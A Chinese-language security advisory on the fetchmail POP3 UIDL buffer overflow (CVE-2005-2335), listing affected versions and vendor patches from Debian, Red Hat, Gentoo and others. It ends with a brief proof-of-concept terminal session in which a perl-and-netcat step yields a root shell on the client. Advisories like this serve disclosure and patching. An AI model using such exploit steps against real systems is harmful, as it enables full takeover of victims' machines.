RootSSV:386Fetchmail POP3客户端缓冲区溢出漏洞
0.048 Low
EPSS
Percentile
91.9%
BUGTRAQ ID: 14349
CVE(CAN) ID: CVE-2005-2335
fetchmail是免费的软件包,可以从远程POP2、POP3、IMAP、ETRN或ODMR服务器检索邮件并将其转发给本地SMTP、LMTP服务器或消息传送代理。
fetchmail的POP3客户端在处理服务器回应时存在缓冲区溢出漏洞,恶意服务器可能利用此漏洞在客户端上执行任意指令。
fetchmail-6.2.5及更早版本的处理UID的POP3代码将POP3服务器返回的相应读取到栈中固定大小的缓冲区,没有限制输入长度,这样被入侵的或恶意的POP3服务器就可以覆盖fetchmail的栈,导致完全控制受影响的系统。
在fetchmail-6.2.5.1中,漏洞修复可以通过POP3 UIDL防范代码注入,但却引入了两个空指针引用。攻击者可能利用这个漏洞导致拒绝服务。
Eric Raymond Fetchmail 6.2.5.1
Eric Raymond Fetchmail 6.2.5
Eric Raymond Fetchmail 6.2.0
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1 IA64
RedHat Enterprise Linux AS 2.1
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation 2.1 IA64
RedHat Advanced Workstation 2.1
厂商补丁:
Apple
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://www.apple.com/support/downloads/” target=“_blank”>http://www.apple.com/support/downloads/</a>
Debian
Debian已经为此发布了一个安全公告(DSA-774-1)以及相应补丁:
DSA-774-1:New fetchmail packages fix arbitrary code execution
<a href=“http://www.debian.org/security/2005/dsa-774” target=“_blank”>http://www.debian.org/security/2005/dsa-774</a>
补丁下载:
Source archives:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1.dsc” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1.dsc</a>
Size/MD5 checksum: 650 3eb739416b5b7a906b56b3145cf1ba32
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1.diff.gz” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1.diff.gz</a>
Size/MD5 checksum: 150578 12cdd33c6299e840ffcf3cfa00eb2e0e
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5.orig.tar.gz” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5.orig.tar.gz</a>
Size/MD5 checksum: 1257376 9956b30139edaa4f5f77c4d0dbd80225
Architecture independent components:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail-ssl_6.2.5-12sarge1_all.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail-ssl_6.2.5-12sarge1_all.deb</a>
Size/MD5 checksum: 42268 593148b798ec57fbca09340ecb139c1e
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmailconf_6.2.5-12sarge1_all.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmailconf_6.2.5-12sarge1_all.deb</a>
Size/MD5 checksum: 101356 c7e81ed2ef2c7375e3afb9d937a1aa91
Alpha architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_alpha.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_alpha.deb</a>
Size/MD5 checksum: 572940 7426819c3db555eb6c1b5bf866b2113d
AMD64 architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_amd64.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_amd64.deb</a>
Size/MD5 checksum: 554678 56223b7979f4e4410c05620d153a01ba
ARM architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_arm.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_arm.deb</a>
Size/MD5 checksum: 549146 b8f0493390f4aa713004f913f2696e73
Intel IA-32 architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_i386.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_i386.deb</a>
Size/MD5 checksum: 548184 4b004ec450045c4d0d4b9fda7d9b04cc
Intel IA-64 architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_ia64.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_ia64.deb</a>
Size/MD5 checksum: 597056 5a7e4a0f676edeed83bd3e48d4747b57
HP Precision architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_hppa.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_hppa.deb</a>
Size/MD5 checksum: 561656 5ed8c10d345f358e85f58937e7aa79c9
Motorola 680x0 architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_m68k.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_m68k.deb</a>
Size/MD5 checksum: 537964 8ce1a7e8de2858d8b9166c7166309173
Big endian MIPS architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_mips.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_mips.deb</a>
Size/MD5 checksum: 556648 ee365e9943ae1646eb6ac051c6645833
Little endian MIPS architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_mipsel.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_mipsel.deb</a>
Size/MD5 checksum: 556388 5f07b01938a6171da1c319006700ec93
PowerPC architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_powerpc.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_powerpc.deb</a>
Size/MD5 checksum: 556168 55c628ab054ef7022c679e15edde8fae
IBM S/390 architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_s390.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_s390.deb</a>
Size/MD5 checksum: 554510 5457354b0ee7ed5c735c582408396154
Sun Sparc architecture:
<a href=“http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_sparc.deb” target=“_blank”>http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_sparc.deb</a>
Size/MD5 checksum: 549168 db954a1eafe045ff6f2eb4c3c64abf3f
补丁安装方法:
- 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
dpkg -i file.deb (file是相应的补丁名)
-
使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
apt-get update
然后,使用下面的命令安装更新软件包:
apt-get upgrade
Eric Raymond
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Eric Raymond Patch fetchmail-patch-6.2.5.2.gz
<a href=“http://download.berlios.de/fetchmail/fetchmail-patch-6.2.5.2.gz” target=“_blank”>http://download.berlios.de/fetchmail/fetchmail-patch-6.2.5.2.gz</a>
RedHat
RedHat已经为此发布了一个安全公告(RHSA-2005:640-01)以及相应补丁:
RHSA-2005:640-01:Important: fetchmail security update
链接:<a href=“http://lwn.net/Alerts/144832/?format=printable” target=“_blank”>http://lwn.net/Alerts/144832/?format=printable</a>
Gentoo
Gentoo已经为此发布了一个安全公告(GLSA-200507-21)以及相应补丁:
GLSA-200507-21:fetchmail: Buffer Overflow
链接:<a href=“http://security.gentoo.org/glsa/glsa-200507-21.xml” target=“_blank”>http://security.gentoo.org/glsa/glsa-200507-21.xml</a>
所有fetchmail用户都应升级到最新版本:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/fetchmail-6.2.5.2"
<---+in terminal 1+--->
farenhiet:/home/bannedit/fetchmail-6.2.5# /usr/local/bin/fetchmail -p pop3 --fastuidl 1 localhost
fetchmail: removing stale lockfile
Enter password for root@localhost:
UIDL 2
<---+in terminal 2+--->
farenhiet:/home/bannedit/exploit# perl -e &#39;$|++;while (<>) { print . "\n\x00"; }&#39; | nc localhost 20000
id
uid=0(root) gid=0(root) groups=0(root)
Related
